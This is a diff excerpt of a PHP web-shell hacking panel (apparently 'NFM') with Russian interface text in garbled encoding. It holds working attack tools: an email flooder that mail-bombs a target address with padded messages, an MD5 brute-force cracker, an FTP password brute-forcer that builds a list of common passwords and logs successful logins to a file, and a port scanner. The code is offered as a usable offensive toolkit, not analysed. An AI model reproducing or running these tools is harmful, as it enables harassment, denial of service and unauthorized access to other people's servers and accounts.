+ &nbsp;&nbsp;<b>Ãåíåðàòîð ôëóäà:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;Äëÿ êà÷åñòâà ôëóäà, ôëóäåð Email, ðàçáèò íà äâå âåðñèè: <br>
+ &nbsp;<b>1.</b> Easy Flood - ýòî òóïîé ôëóä, íî áîëåå áûñòðûé, íî åãî ëåãêî óäàëèòü, â ñóòêè çàñèðàåòñÿ ÿùèê îêîëî 100000 ïèñåì, íåêîòîðûå ñåðâåðà ôèëüòðóþò åãî<br>
+ &nbsp;<b>2.</b> Hard Flood - ïðîäâèíóòûé ôëóä, íî áîëåå ðåñóðñîåìêèé, ïîääåëûâàåò îò êîãî ôëóä, à òàêæå óìååò åùå êó÷ó âîçìîæíîñòåé</td></tr>
+ <tr><td align=left class=pagetitle>&nbsp;&nbsp;<input type='radio' name='check_box' value ='1'>&nbsp;&nbsp; <b>Easy Flood</b></td></tr>
+ <tr><td align=left class=pagetitle>&nbsp;&nbsp;<input type='radio' name='check_box' value ='2'>&nbsp;&nbsp; <b>Hard Flood</b></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='Íà÷àòü' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+ 
+if ($check_box == "1"){ 
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=flud&status=easy' method=post>
+ <tr><td align=center class=pagetitle colspan=2><font color=#76A8AB><b> .:Easy Flood:. </b></font></b></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Email ãàäà:</td>
+<td align=left width=250><input class='inputbox' type='text' name='emailflood' size=45></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Êîëè÷åñòâî ïèñåì:</td>
+<td align=left width=250><input class='inputbox' type='text' name='kol' size=15></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Èíòåðâàë îòïðàâêè (ñåê):</td>
+<td align=left width=250><input class='inputbox' type='text' name='wait' size=15></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Ðàçìåð ïèñüìà (êá):</td>
+<td align=left width=250><input class='inputbox' type='text' name='sizeletter' size=45></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Òåìà ñîîáùåíèÿ:</td>
+<td align=left width=250><input class='inputbox' type='text' name='subject' size=45></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Òåêñò ïèñüìà:</td>
+<td align=left width=250><textarea name='body' rows='13' cols='50' class=inputbox> </textarea></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Ãåíåðèòü' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+ 
+
+} 
+
+
+ if ($status == "easy"){
+  error_reporting(63); if($emailflood=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Email ãàäà>')</script>";exit;}
+ error_reporting(63); if($kol=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Êîëè÷åñòâî ïèñåì>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Èíòåðâàë îòïðàâêè>')</script>";exit;}
+ error_reporting(63); if($sizeletter=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Ðàçìåð ïèñüìà>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåìà ñîîáùåíèÿ>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåëî ïèñüìà>')</script>";exit;}
+
+ 
+$text=strlen($body)+1; 
+$sizeletter_kb=(1024/$text)*$sizeletter;
+$sizeletter_kb=ceil($sizeletter_kb);
+
+for ($i=1; $i<=$sizeletter_kb; $i++) {
+$msg=$msg.$body." ";
+}
+
+     
+for ($i=1; $i<=$kol; $i++){
+ if($emailflood != "") {
+ 
+@mail($emailflood, $body, $msg, "From: $subject");
+ $sec = $wait * 1000000;
+      usleep($sec);
+	  }
+	 
+}
+
+}
+
+ 
+ }
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+function crypte() {
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Êðèïòîâàíèå äàííûõ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>Íà äàííûé ìîìåíò â èíòåðíåòå ñóùåñòâóåò îãîðîìíîå êîëëè÷åñòâî ïðîãðàìì è ñêðèïòîâ, êîòîðûå èñïîëüçóþò ðàçëè÷íûå ìåòîäû øèôðîâàíèÿ ïàðîëåé, 
+ñ ïîìîùüþ NFM âû ìîæåòå ïîëó÷èòü äîñòóï ê èçìåíåíèþ ýòèõ äàííûõ, íî áûâàåò íóæíûì èçìåíèòü äàííûå íà ñâîè, äëÿ ýòîãî ÿ âûáðàë ñàìûå ïîïóëÿðíûå ìåòîäû øèôðîâàíèÿ.</blockquote></td></tr>
+</table>";
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Ïîïóëÿðíûå ìåòîäû øèôðîâàíèÿ, ïîääåðæèâàåìûå áèáëèîòåêîé MHASH:</b></td></tr>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>MD5 </b>(ñàìûé ðàñïðàñòðàíåííûé ìåòîä øèôðîâàíèÿ äàííûõ)</td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;Ðåçóëüòàò:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+ <td class=pagetitle width=100>&nbsp;Ââîä:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+ 
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>SHA1 </b>(òîæå äîâîëüíî ïîïóëÿðíûé ìåòîä øèôðîâàíèÿ äàííûõ)</td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;Ðåçóëüòàò:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+ <td class=pagetitle width=100>&nbsp;Ââîä:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+ 
+ </form></table>";
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;<b>CRC32 </b>(â îñíîâíîì èñïîëüçóåòñÿ ïðè âû÷èñëåíèè êîíòðîëüíûõ ñóìì äëÿ ïðîâåðêè öåëîñòíîñòè äàííûõ, íî è â íåêîòîðûõ ôîðóìàõ â êà÷åñòâå øèôðîâêè ïàðîëåé)</td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;Ðåçóëüòàò:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+ <td class=pagetitle width=100>&nbsp;Ââîä:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+ 
+ </form></table>";
+ 
+ }
+
+function decrypte() {
+ global $action,$pass_de,$chars_de,$dat,$date;
+set_time_limit(0);
+ignore_user_abort(1);
+
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Äåêîäèðîâàíèå äàííûõ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>Âñåì èçâåñòíî, ÷òî md5 íåëüçÿ ìãíîâåííî äåêîäèðîâàòü, òàê êàê èñïîëüçóåòñÿ îäíîíàïðàâëåííîå øèôðîâàíèå (àëãîðèòì õýøèðîâàíèÿ), 
+ ñîçäàþùåå óíèêàëüíûé îòïå÷àòîê èñõîäíûé ñòðîêè, à èìåííî 128-áèòîâûé (md5).  íàñòîÿùåå âðåìÿ ñ÷èòàåòñÿ íåâîçìîæíûì ïî ýòîìó îòïå÷àòêó
+ âîñòàíîâèòü èñõîäíûå äàííûå, îáðàòèâ ïðîöåäóðó, ÿ æå ïîïðîáóþ ïðèìåíèòü ìåòîä «ãðóáîé ñèëû», à èìåííî ïîëíûé ïåðåáîð äî ñîâïàäåíèÿ âõîäíûõ è âûõîäíûõ äàííûõ.</blockquote></td></tr>
+</table>";
+
+if($chars_de==""){$chars_de="";}
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Äåøèôðîâêà äàííûõ:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;<b>Decrypte MD5</b>(ðàñøèôðîâêà õåøà çàâèñèò îò äëèíû ïàðîëÿ è çàíèàåò îïðåäåëåííîå êîëëè÷ñåòâî âðåìåíè)</td></tr>
+ <tr>
+ <td class=pagetitle width=400 >&nbsp;MD5 õåø:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Î÷èñòèòü class=button1 $style_button></td>
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+  <td class=pagetitle width=120 valign=top><b>Ïåðåáîð áóêâ:</b><br><font color=red><b><u>ENG:</u></b></font>
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:¹.,&quot;')>[Ñèìâîëû]</a><br><br>
+<font color=red><b><u>RUS:</u></b></font>
+<a class=menu href=javascript:ins('àáâãäå¸æçèéêëìíîïðñòóôõö÷øùúûüýþÿ')>[à-ÿ]</a>
+<a class=menu href=javascript:ins('ÀÁÂÃÄŨÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞß')>[À-ß]</a>
+</td></tr>
+<tr><td align=center width=400>
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+
+
+if($_POST[pass_de]){
+$pass_de=htmlspecialchars($pass_de);
+$pass_de=stripslashes($pass_de);
+$dat=date("H:i:s");
+$date=date("d:m:Y");
+
+crack_md5();
+}
+} 
+
+function crack_md5() {
+global $chars_de;
+$chars=$_POST[chars];
+set_time_limit(0);
+ignore_user_abort(1);
+$chars_de=str_replace("<",chr(60),$chars_de);
+$chars_de=str_replace(">",chr(62),$chars_de);
+$c=strlen($chars_de);
+for ($next = 0; $next <= 31; $next++) {
+for ($i1 = 0; $i1 <= $c; $i1++) {
+$word[1] = $chars_de{$i1};
+for ($i2 = 0; $i2 <= $c; $i2++) {
+$word[2] = $chars_de{$i2};
+if ($next <= 2) {
+result(implode($word));
+}else {
+for ($i3 = 0; $i3 <= $c; $i3++) {
+$word[3] = $chars_de{$i3};
+if ($next <= 3) {
+result(implode($word));
+}else {
+for ($i4 = 0; $i4 <= $c; $i4++) {
+$word[4] = $chars_de{$i4};
+if ($next <= 4) {
+result(implode($word));
+}else {
+for ($i5 = 0; $i5 <= $c; $i5++) {
+$word[5] = $chars_de{$i5};
+if ($next <= 5) {
+result(implode($word));
+}else {
+for ($i6 = 0; $i6 <= $c; $i6++) {
+$word[6] = $chars_de{$i6};
+if ($next <= 6) {
+result(implode($word));
+}else {
+for ($i7 = 0; $i7 <= $c; $i7++) {
+$word[7] = $chars_de{$i7};
+if ($next <= 7) {
+result(implode($word));
+}else {
+for ($i8 = 0; $i8 <= $c; $i8++) {
+$word[8] = $chars_de{$i8};
+if ($next <= 8) {
+result(implode($word));
+}else {
+for ($i9 = 0; $i9 <= $c; $i9++) {
+$word[9] = $chars_de{$i9};
+if ($next <= 9) {
+result(implode($word));
+}else {
+for ($i10 = 0; $i10 <= $c; $i10++) {
+$word[10] = $chars_de{$i10};
+if ($next <= 10) {
+result(implode($word));
+}else {
+for ($i11 = 0; $i11 <= $c; $i11++) {
+$word[11] = $chars_de{$i11};
+if ($next <= 11) {
+result(implode($word));
+}else {
+for ($i12 = 0; $i12 <= $c; $i12++) {
+$word[12] = $chars_de{$i12};
+if ($next <= 12) {
+result(implode($word));
+}else {
+for ($i13 = 0; $i13 <= $c; $i13++) {
+$word[13] = $chars_de{$i13};
+if ($next <= 13) {
+result(implode($word));
+}else {
+for ($i14 = 0; $i14 <= $c; $i14++) {
+$word[14] = $chars_de{$i14};
+if ($next <= 14) {
+result(implode($word));
+}else {
+for ($i15 = 0; $i15 <= $c; $i15++) {
+$word[15] = $chars_de{$i15};
+if ($next <= 15) {
+result(implode($word));
+}else {
+for ($i16 = 0; $i16 <= $c; $i16++) {
+$word[16] = $chars_de{$i16};
+if ($next <= 16) {
+result(implode($word));
+}else {
+for ($i17 = 0; $i17 <= $c; $i17++) {
+$word[17] = $chars_de{$i17};
+if ($next <= 17) {
+result(implode($word));
+}else {
+for ($i18 = 0; $i18 <= $c; $i18++) {
+$word[18] = $chars_de{$i18};
+if ($next <= 18) {
+result(implode($word));
+}else {
+for ($i19 = 0; $i19 <= $c; $i19++) {
+$word[19] = $chars_de{$i19};
+if ($next <= 19) {
+result(implode($word));
+}else {
+for ($i20 = 0; $i20 <= $c; $i20++) {
+$word[20] = $chars_de{$i20};
+if ($next <= 20) {
+result(implode($word));
+}else {
+for ($i21 = 0; $i21 <= $c; $i21++) {
+$word[21] = $chars_de{$i21};
+if ($next <= 21) {
+result(implode($word));
+}else {
+for ($i22 = 0; $i22 <= $c; $i22++) {
+$word[22] = $chars_de{$i22};
+if ($next <= 22) {
+result(implode($word));
+}else {
+for ($i23 = 0; $i23 <= $c; $i23++) {
+$word[23] = $chars_de{$i23};
+if ($next <= 23) {
+result(implode($word));
+}else {
+for ($i24 = 0; $i24 <= $c; $i24++) {
+$word[24] = $chars_de{$i24};
+if ($next <= 24) {
+result(implode($word));
+}else {
+for ($i25 = 0; $i25 <= $c; $i25++) {
+$word[25] = $chars_de{$i25};
+if ($next <= 25) {
+result(implode($word));
+}else {
+for ($i26 = 0; $i26 <= $c; $i26++) {
+$word[26] = $chars_de{$i26};
+if ($next <= 26) {
+result(implode($word));
+}else {
+for ($i27 = 0; $i27 <= $c; $i27++) {
+$word[27] = $chars_de{$i27};
+if ($next <= 27) {
+result(implode($word));
+}else {
+for ($i28 = 0; $i28 <= $c; $i28++) {
+$word[28] = $chars_de{$i28};
+if ($next <= 28) {
+result(implode($word));
+}else {
+for ($i29 = 0; $i29 <= $c; $i29++) {
+$word[29] = $chars_de{$i29};
+if ($next <= 29) {
+result(implode($word));
+}else {
+for ($i30 = 0; $i30 <= $c; $i30++) {
+$word[30] = $chars_de{$i30};
+if ($next <= 30) {
+result(implode($word));
+}else {
+for ($i31 = 0; $i31 <= $c; $i31++) {
+$word[31] = $chars_de{$i31};
+if ($next <= 31) {
+result(implode($word));
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+function result($word) {
+global $dat,$date;
+$pass_de=$_POST[pass_de];
+$dat2=date("H:i:s");
+$date2=date("d:m:Y");
+
+if(md5($word)==$pass_de){ 
+print "
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Ðåçóëüòàò âûïîëíåíèÿ ïåðåáîðà ïàðîëåé:</td></tr>
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>Çàõåøèðîâàííûé ïàðîëü:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Íà÷àëî ïåðåáîðà:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Îêîí÷àíèå ïåðåáîðà:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;Âûïîëíåíèå ïåðåáîðà õåøåé çàïèñàí â ôàéë:  <b>".$word."_md5</b></td></tr>
+</table>
+                            ";
+							$f=@fopen($word._md5,"a+");
+                            fputs($f,"Õýø èç MD5 [$pass_de] = $word\nÍà÷àëî ïåðåáîðà:\t$dat - $date\nÎêîí÷àíèå ïåðåáîðà:\t$dat2 - $date2\n ");
+                             exit;}
+
+
+
+}
+
+function brut_ftp() {
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Áðóòôîðñåð ÔÒÏ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>Ñ ïîìîùüþ äàííîãî áðóòôîðñåðà âû ñìîæåòå ïîäîáðàòü ïàðîëü ê ëþáîìó õîñòèíãó áåç ïðîáëåì, ÷òîáû áûëî ÷òî ïåðåáèðàòü ÿ äîáàâèë áàçó
+ïàðîëåé, êîòîðàÿ ãåíåðèðóåòñÿ íà ëåòó ( íå ïèøèòå áîëüøèå öèôðû â <b>êîëëè÷åñòâå ïàðîëåé</b> òàê êàê ýòî ñåðüåçíàÿ íàãðóçêà íà ñåðâåð 10000 âïîëíå õâàòèò) . </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;<b>Brutforcer Ftp</b>(ïîëíîöåííûé áðóòôîðñåð, êîòîðûé ðàáîòàåò ïî ìåòîäó ïîäñòàíîâêè ïàðîëåé, êîòîðûå áåðåò èç ôàéëà, ôàéë ãåíåðèðóåòñÿ ñàì, âû òîëüêî óêàçûâàåòå ÷èñëî ïàðîëåé è âñå ïåðåáîð íà÷èíàåòñÿ!!!)</td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êîëëè÷åñòâî ïàðîëåé:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ïàðîëü äëÿ ïðîâåðêè:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Brut FTP' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "íåòó íè÷åãî";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$proverka";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäðàâëÿþ!!! Ïàðîëü ïîäîáðàí.</font></b><br>
+&nbsp;&nbsp;Êîíåêò: <b>$host</b><br>&nbsp;&nbsp;Ëîãèí: <b>$login</b><br>&nbsp;&nbsp;Ïàðîëü: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íå âåðíî óêàçàíî ôòï õîñòèíãà!!! Íà <b><u>$host</u></b> çàêðûò 21 ïîðò</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+}
+
+# Ïîðòñêàí
+function portscan() {
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+ $mtime = explode(" ",microtime());
+ $mtime = $mtime[1] + $mtime[0];
+ $time1 = $mtime;
+
+ $id = $HTTP_HOST;
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Ðåçóëüòàòû ñêàíèðîâàíèÿ:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Ñêàíèðóåì õîñòèíã íà íàëè÷èå îòêðûòûõ ïîðòîâ" . "...<br></td></tr></table>";
+
+ $lport = $min; 
+ $hport = $max; 
+ $op = 0;
+ $gp = 0;
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4); 
+  if ( !$fp ) { $gp++; }
+  else {
+   $port_addres = $port[$porta];
+   if($port_addres == "") $port_addres = "unknown";
+   $serv = getservbyport($porta, TCP);
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>×òî ýòî?</a>)</td></tr>";
+   $op++;
+  } 
+ } 
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Íà äàííîì õîñòèíãå íåò îòêðûòûõ ïîðòîâ</b></td></tr></table>";
+
+ $unsi = ($op/$porta)*100;
+ $unsi = round($unsi);
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Ñòàòèñòèêà ñêàíèðîâàíèÿ:</b></b></td></tr>";
+ echo "<tr><td align=center width=100% colspan=3><b>Ïðîñêàíèðîâàííûõ ïîðòîâ:</b>&nbsp;&nbsp;$porta</td></tr>";
+ echo "<tr><td align=center width=100% colspan=3><b>Îòêðûòûõ ïîðòîâ:</b>&nbsp;&nbsp;$op</td></tr>";
+ echo "<tr><td align=center width=100% colspan=3><b>Çàêðûòûõ ïîðòîâ:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+ $mtime = explode(" ",microtime());
+ $mtime = $mtime[1] + $mtime[0];
+ $time2 = $mtime;
+ $loadtime = ($time2 - $time1); 
+ $loadtime = round($loadtime, 2); 
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Âðåìÿ ñêàíèðîâàíèÿ:</b>&nbsp;&nbsp;$loadtime ñåêóíä</tr></table>";
+}
+
+function nfm_copyright() {
+global $action;
